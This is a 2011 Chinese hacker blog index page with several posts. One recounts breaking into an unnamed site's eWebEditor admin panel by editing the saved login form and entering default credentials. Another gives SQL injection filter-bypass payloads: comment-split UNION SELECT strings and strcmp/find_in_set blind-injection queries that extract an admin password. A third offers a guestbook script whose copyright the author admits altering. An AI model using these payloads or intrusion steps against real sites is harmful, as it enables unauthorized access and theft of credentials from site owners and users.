陈可逆 's Blog - -外表的坚强，内心的绝望。我们就这样，无力的成长
首页
留言
链接
归档
星标日志
邮箱登陆
RSS
分页： 1/12 1 2 3 4 5 6 7 8 9 10 [ 显示模式： 摘要 | 列表 ]
[置顶] 欢迎和我交换友情连接
Category : 个人日记 Post on 2011/05/26 17:51 by admin Comments: 0
欢迎和我交换友情连接网络国界 人心无谓好与坏 我们心连心 手牵手 搭起和谐美好激情的网络！欢迎各站长 各大博友 各大贵站 与我交换友情链接！进入提交友情链接地址：http://www.r0...job=applylink请也把我的链接坐上 我一律都通过大家。谢谢！
Tags: 友情，连接
评论(0) | 引用(0) | 阅读(33)
引用地址： 注意： 该地址仅在今日23:59:59之前有效
[置顶] 腾讯阻碍了多少黑客少年的梦想
Category : 个人日记 Post on 2011/05/26 11:57 by admin Comments: 4
腾讯，中国十大网站之一。从98年腾讯QQ开始，到04年QQ改革，一直到现在，可以说QQ已经风靡全国。腾讯为了挣钱，其附属产品相继出现：腾讯会员，各种钻，超Q，腾讯游戏，Q币等，数不胜数！于是相应的腾讯产品出现了黑客技术！ 本人是新手，全靠自学，道行低下。但经出道早的朋友与一些资料，让我认识到—腾讯阻碍了我国少年黑客的道路！ 腾讯QQ越来越吸引人，许多人以有位数少的Q号为骄傲，试问：位数多少和功能有什么区别？于是一些黑客抓住了这个商机，写些木马盗Q号。盗号行为风靡一时。许多学习黑客的新手开始学习总是先学习如何盗Q号，但那有何用？当我们学习盗Q号时，国外的人正研究各类编程语言，学习入侵等实用长久的技术！05,06年我们盗Q号，弄QQ信封，等07,08年我们开始学习sql注入等入侵技术，你们可知，国外黑客至少比我们前进两年！悲哀啊！悲哀！再说一些收徒弟的黑客，那些是真正黑客的有几个人呢？我曾经看到某某人收徒，教授盗号技术，还是指定盗号。哇！牛啊，联系，问之可否指定盗号？答曰:可以。让其盗我的号，结果第二天一上线，邮箱新邮件二十多封，且都有附件，都是木马。也发了许多网站，肯定挂马！哎，这就是所谓的指定盗号。。。不如去多学习入侵，等NB之时，说不定入侵腾讯服务器，所有QQ号任你选。。。 现在还在挣扎在QQ行列中的人们注意了，清醒吧，QQ只是一聊天工具，在真正黑客眼中是漏洞百出的工具，现在又一个号就行了。不要再去追求什么5,6,7,8位数的号了，有意思吗？还在刷钻中奋斗的人们，放弃吧，钻有何用？只不过是QQ中一个标志罢了。。。还在徘徊在QQ游戏中为了QQ币而苦恼的人们，清醒吧，用人民币购买那虚幻的东西值吗？ 如果各位还是无法放弃，那各位学点其他东西吧！学习编程:c语言（虽然是大学必须掌握的编程语言，但真正能灵活运用的有几人？），c++，vb等，实在不会你学易语言。学成之后自己开发聊天工具，压倒QQ，自己掌握了所有好的号码，各种绚丽的标志也弄上，那不是更快哉！学习网站技术：自己开网站，压倒腾讯网站，让别人使用你网站的虚拟币，看谁顺眼，敲几下键盘，给他万儿八千的，多牛啊！学习游戏开发：玩自己开发的游戏，一分钱不花，装备全其，嘿嘿。。。恐怕到时候你就会明白，以前的种种都是多么幼稚了。。。 清醒了吧。。。还等什么，赶快找准目标，行动吧！！！
Tags: 腾讯
评论(4) | 引用(0) | 阅读(68)
引用地址： 注意： 该地址仅在今日23:59:59之前有效
谁说HTML不能日站的，我日啊日
Category : 个人日记 raquo; 渗透笔记 | Post on 2011/06/11 10:13 by admin | Comments:0
呵呵刚才实在是闲着没事干，就找了个网站检测检测，俺不是什么高手，搞不了什么大网站，就是喜欢没事研究研究，今天在自己的地盘上献个丑。目标：http://www.XXX.cn/发现有ewebeditor存在。http://www.XX...cn/ewebeditor于是提交：http://www.XX...min_login.asp MD，没输入密码的地方啊，就算知道密码和用户名也没用啊。。果真如此？我们来试试：把当前页保存到本地为html文件，打开修改代码，原来的是这样的：我们加上一个输入密码的框变成如下：记住，一定还要修改表单action后面提交路径，注意看两幅图的差别！，o(∩_∩)o...哈哈没事，虽然难看但是实用啊，接着我们输入用户名admin 密码admin回车。OK登陆成功：来自九区。
Tags: html不能日 , 可以日
引用地址： 注意： 该地址仅在今日23:59:59之前有效
sqlinjection下的新型注入 amp;绕过方式
Category : 技术讨论 | Post on 2011/06/11 10:03 by admin | Comments:0
自sql注入发展至今，许多安全文章似乎扭曲了不少人的注射思维，传统的检测注射方法是通过： and 1=1 , and 1=2 来判断真假从而判断是否过滤完全，当然，也有 or 1=2,or 1=1，或者 在数值注射 例如：id=1+1 或id=2-1,等等 本文的目的不是评判谁的检测方法实用，只是向大家推荐一些新的注射方式，可能早有人提及了:) 注:主要针对php下的mysql注射，可借鉴，就不一一介绍了 首先说判断： Null值相信大家不陌生吧，可这么用： and 1 is null,and 1 is not null 或: and 2=3 其实，很多人习惯性的用=号来判断了，但是，如： = ,= ,is null,is not null,等 都可用于判断 接着说注入 对于注射取值，我们熟悉的就是union select 和 blind sqlinjection（盲注) 先说Union Select 对于常规的注射，我们可以union select 1,2,3,4 或 union/**/select/**/ 1,2,3,4 Ok,看我演示， id=1+u/**/nio/**/n+se/**/lect+1 id=2,3 id=4 够恶心吧？可绕过国内所有防注射哦:) 这代码运行后效果如上，至于原理我希望大家自己去查查相关资料，有异议的可给我留言 当然，在语句传递多个参数时 例如 slect * from table where id = 1 and name = xxx ，我们可这么做： id=1+union/* name=*/select+1,2 代入查询后 slect * from table where id = 1 union /* and name = xxx */ select 1,2 这是一种让常量（变量）失效的技巧，当然，环境要求比较苛刻 :) 下面说说Blind SqlIjection（盲注）： 一般方式，我想大家应该是这么做的： ascii(substring(password,1,1))=56，或者是 ord(mid(password,1,1))=56 在此，我推荐大家还是用子查询，当然，前提是猜出表，字段，可更为准确的得到想得到的数据 此前，仍然向大家推荐一些新型的手法： find_in_set 例: find_in_set('56',ascii(substr(password,1,1)))=1 strcmp 例： strcmp(left('password',1), 0x56) = 1 将这些函数套如子查询就是： id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0x55)=1 false id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0x56)=0 true id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0x57)=-1 false 不明白原理的请查阅函数手册或给我留言 by:寂寞hacker
Tags: sqlinjection下的新型注入 amp;绕过方式 , 绕过方式
引用地址： 注意： 该地址仅在今日23:59:59之前有效
php菊花留言板。。
Category : 工具下载 | Post on 2011/06/09 20:35 by admin | Comments:1
群共享里看到的。。。果断改了版权。。。发上来给大家**php的站。。示例：http://qiusuo....net/jhly.php下载文件 点击这里下载文件
Tags: php菊花留言板 , php
引用地址： 注意： 该地址仅在今日23:59:59之前有效
分页： 1/12 1 2 3 4 5 6 7 8 9 10 [ 显示模式： 摘�